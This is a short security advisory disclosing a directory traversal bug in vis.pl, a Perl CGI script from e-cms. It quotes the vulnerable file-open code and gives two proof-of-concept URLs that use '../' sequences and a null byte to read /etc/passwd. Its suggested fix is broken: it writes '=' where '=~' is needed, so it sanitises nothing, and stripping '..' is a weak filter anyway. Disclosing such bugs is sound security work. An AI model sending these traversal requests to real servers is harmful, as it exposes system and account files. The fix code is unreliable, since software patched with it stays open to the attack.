Hackers Center Security Group (http://www.hackerscenter.com/)
spher3's Security Advisory 


Multiple transversal bug in vis.pl 


 -------------------------------------------------------------------------- 

Description: 

Vis.pl is a perl script which manages files in order to show these;
you can find it in e-cms default files. The vulnerability taken in
exam is classifiable as transversal bug. In fact can show to everybody
files such as passwords or accounts. 

 -------------------------------------------------------------------------- 

Code Details: 

Vis.pl doesn't control cgi query except for: 

[...] 

if ( -e $datFile )
{
open ( DAT_FILE, "$datFile" ); 

[...] 

This function controls only the file existence.
Then the script start to open the file without check dangerous
characters as "." and "/".
So is simply to access where you want: 

http://[target]/cgi-bin/e-cms/vis/vis.pl?s=001&p=../../../../etc/passwd%00 

All variables that open files are unsafe: 

http://[target]/cgi-bin/e-cms/vis/vis.pl?s=../../../../etc/passwd%00 

 -------------------------------------------------------------------------- 

How to fix: 

You can fix this script with remove those dangerouse characters as taught
from W3C WWW Security FAQ. Just adding a line: 

$datFile = s/\.\.//g; 

You have to insert a line like this for ALL variables which contain files
to open.